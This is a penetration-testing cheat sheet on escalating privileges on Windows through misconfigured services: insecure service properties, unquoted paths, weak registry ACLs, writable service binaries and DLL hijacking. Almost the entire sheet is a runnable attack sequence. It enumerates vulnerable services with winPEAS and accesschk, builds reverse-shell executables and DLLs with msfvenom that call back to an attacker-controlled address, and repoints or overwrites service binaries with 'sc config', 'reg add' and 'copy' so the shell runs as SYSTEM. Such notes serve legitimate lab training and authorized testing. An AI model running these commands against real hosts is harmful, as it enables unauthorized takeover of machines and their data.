Service Exploits
NB: You have to be able to start/stop a service to exploit
.\accesschk.exe /accepteula -uvqc $SERVICE
Insecure Service Properties
Find the vulnerable service
.\winPEASany.exe quiet servicesinfo
Confirm access to the service
.\accesschk.exe /accepteula -uqvwc $USER $SERVICE
Check configuration
sc qc $SERVICE
Check service state
sc query $SERVICE
Payload
msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f exe -o rev.exe
Set service path to location of shell on victim
sc config $SERVICE binpath= "\"C:\Users\$USER\Desktop\rev.exe\""
Start nc listener
Restart the service
Unquoted Service Paths
Useful when you can write to a directory somewhere in the service path but cannot overwrite files in the binary's own directory
Abuses the way Windows resolves an unquoted executable path that contains spaces. For example, given the path
C:\Program Files\Service\Cool Service\svc.exe
Windows will try, in order:
C:\Program.exe
C:\Program Files\Service.exe
C:\Program Files\Service\Cool.exe
Create an executable with the appropriate name and place it in the corresponding (writable) directory
Find vulnerability
.\winPEASany.exe quiet servicesinfo
Or use wmic
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
You need
Path to .exe that does not contain quotes
Write permissions to any prior folder in the tree
Confirm service access for your user
.\accesschk.exe /accepteula -uvqc $USER $SERVICE
Check write permission to existing binary paths
.\accesschk.exe /accepteula -uwdq "C:\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
If you have a writeable directory, name the reverse shell payload after the next path component, i.e. $FolderName.exe
Put it in the directory
Start nc listener
Restart the service
Weak Registry Permissions
If the ACL on a service's registry key is misconfigured, we can modify the service configuration there even when sc config is denied
winPEAS will find all of these
Verify
Get-ACL HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
or
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
Check if you have permission to start and stop the service
.\accesschk.exe /accepteula -ucqv $USER regsvc
Check the registry values for services
reg query HKLM\System\CurrentControlSet\Services\regsvc
With write permission, ImagePath can be overwritten to point at the rev.exe payload
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\path\to\revshell.exe /f
Start nc listener
Restart the service
Insecure Service Executables
If the service .exe itself is writable, just replace it with our own msfvenom payload renamed to match
.\winPEASany.exe quiet servicesinfo
Validate access
.\accesschk.exe /accepteula -uwq "C:\Program Files\File Permissions Service\$service.exe"
Confirm access to start/stop
.\accesschk.exe /accepteula -ucqv $user $service
Backup or rename original .exe
move "C:\Program Files\File Permissions Service\$service.exe" $service.exe.bak
Copy the payload into the original location
copy /Y C:\path\to\rev.exe "C:\Program Files\File Permissions Service\$service.exe"
Start nc listener
Restart the service
DLL Hijacking
Some programs require libraries (DLLs) to be loaded at run time
If the DLL is referenced by an absolute path, or is missing entirely, and we have write access to the directory it is loaded from, we can do essentially the same as replacing the .exe itself
winpeas usually finds these
Check access to start/stop
.\accesschk.exe /accepteula -ucqv $user $dllsvc
Check the service
sc qc dllsvc
To be very sure, you can copy the service binary to a VM and check it with procmon to confirm the search path; however, running the .exe from the location where the DLL is expected is usually enough. If you have GUI access it's easier to figure this out locally
Create a dll reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f dll -o reverse.dll
Copy into the folder with the path
Stop and start the service
net stop $dllsvc && net start $dllsvc